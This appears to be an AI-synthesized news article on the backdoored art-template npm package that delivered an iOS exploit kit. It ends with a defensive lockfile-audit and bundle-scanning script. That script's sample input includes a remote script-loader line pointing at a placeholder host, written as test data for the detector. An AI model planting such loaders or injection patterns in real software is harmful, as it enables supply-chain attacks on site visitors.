VYPR
breach · Published May 22, 2026 · Updated May 24, 2026 · 1 source

Hackers Backdoor Popular art-template npm Package to Launch Watering-Hole Attacks

The art-template npm package was backdoored in a supply-chain attack delivering the Coruna iOS exploit kit, turning any site using the compromised package into a watering hole for Apple device owners.

A widely used JavaScript templating library called art-template has been weaponized to deliver a sophisticated iOS browser exploit kit through a supply chain attack. The backdoored package silently dropped malicious code into end users' browsers, turning everyday web applications into watering holes targeting Apple device owners worldwide.

The attack began when the art-template npm package, originally developed by a maintainer known as "aui," was handed over to an unknown actor under the pretense of continuing its maintenance. According to the original author, the new controller almost immediately began weaponizing the package. Issue reports flagging the suspicious behavior were quietly deleted while the attacker continued pushing malicious versions to suppress discovery.

Researchers at Socket.dev said in a report shared with Cyber Security News (CSN) that they identified the campaign and linked it to a previously documented iOS exploit framework called the Coruna exploit kit. Their analysis, titled "Coruna Respawned," revealed the implant inside the backdoored package closely mirrors delivery patterns from that earlier framework, suggesting direct reuse or a near-identical derivative.

The backdoored versions followed an escalating injection pattern across multiple releases. Version 4.13.3 used encoding to hide a loader pointing to a suspicious external domain. Versions 4.13.5 and 4.13.6 dropped the obfuscation entirely and injected a plaintext script loader directly into the package's browser bundle file. Any web application that included those versions would silently load and execute the exploit kit in every visitor's browser.

The core of the attack is a JavaScript implant that functions as a watering hole exploit delivery framework. Once injected through the compromised npm package, it quietly fingerprints each site visitor. The implant only activates on Safari running on iOS 11.0 through 17.2, and silently exits on Chrome, Firefox, Edge, Android, and iOS 17.3 or higher. Once a matching device is detected, the implant begins beaconing the victim's public IP address, iOS version string, and a campaign tracking code to a command-and-control server every ten seconds.

Payload selection is tailored to the victim's iOS version, with each of five version bands mapping to a different remote exploit module. Researchers found the hard cutoff at iOS 17.3 aligns precisely with the patch boundary for CVE-2024-23222, a WebKit vulnerability Apple fixed at that exact release. That precision strongly suggests browser-level exploitation rather than conventional phishing.

Developers are urged to audit dependency trees for art-template versions 4.13.3 through 4.13.6. Locking dependencies, reviewing browser bundle outputs for unexpected script loaders, and monitoring outbound network requests from JavaScript runtimes are the primary mitigations. Any application deployed with affected versions should undergo an immediate security review.
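The dependency audit and bundle review recommended above, as an added example that is not code from the article or the Socket.dev report. It assumes a lockfileVersion 2/3 package-lock.json, and the hostnames and sample inputs are constructed placeholders.

```javascript
// Added example, not code from the article or the Socket.dev report: audit an
// npm lockfile for the affected art-template range and scan a built browser
// bundle for injected remote script loaders. Hostnames below are placeholders.
const AFFECTED = { name: "art-template", min: [4, 13, 3], max: [4, 13, 6] };

function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(v || "");
  return m ? m.slice(1, 4).map(Number) : null;
}
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}
function isAffectedVersion(version) {
  const v = parseVersion(version);
  return v !== null && compareVersions(v, AFFECTED.min) >= 0 && compareVersions(v, AFFECTED.max) <= 0;
}

// Walks the lockfileVersion 2/3 "packages" map. Nested copies live under
// "node_modules/<parent>/node_modules/art-template", so every path is checked.
function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const name = path.split("node_modules/").pop();
    if (name === AFFECTED.name && isAffectedVersion(entry.version)) {
      findings.push({ path, version: entry.version });
    }
  }
  return findings;
}

// Flags <script src> tags and dynamically created script elements whose
// host is not on the allowlist: the plaintext loader pattern described above.
function findScriptLoaders(bundleText, allowedHosts) {
  const re = /(?:<script[^>]*\ssrc\s*=\s*|\.src\s*=\s*)["'](https?:\/\/[^"']+)["']/gi;
  const hits = [];
  for (const m of bundleText.matchAll(re)) {
    if (!allowedHosts.includes(new URL(m[1]).hostname)) hits.push(m[1]);
  }
  return hits;
}
// Constructed sample inputs: a safe direct copy plus an affected nested copy,
// and a bundle with one allowlisted loader and one unexpected loader.
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  "node_modules/art-template": { version: "4.13.2" },
  "node_modules/some-dep/node_modules/art-template": { version: "4.13.5" } } };
const SAMPLE_BUNDLE = '<script src="https://cdn.example.invalid/app.js"></script>' +
  'var s=document.createElement("script");s.src="https://loader.example.invalid/x.js";document.head.appendChild(s);';
console.log(auditLockfile(SAMPLE_LOCK), findScriptLoaders(SAMPLE_BUNDLE, ["cdn.example.invalid"]));
```

Run it against the real package-lock.json (JSON.parse the file) and the built bundle text; the nested-copy check matters because a transitive dependency can pull in an affected version even when the direct one is clean.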

Synthesized by Vypr AI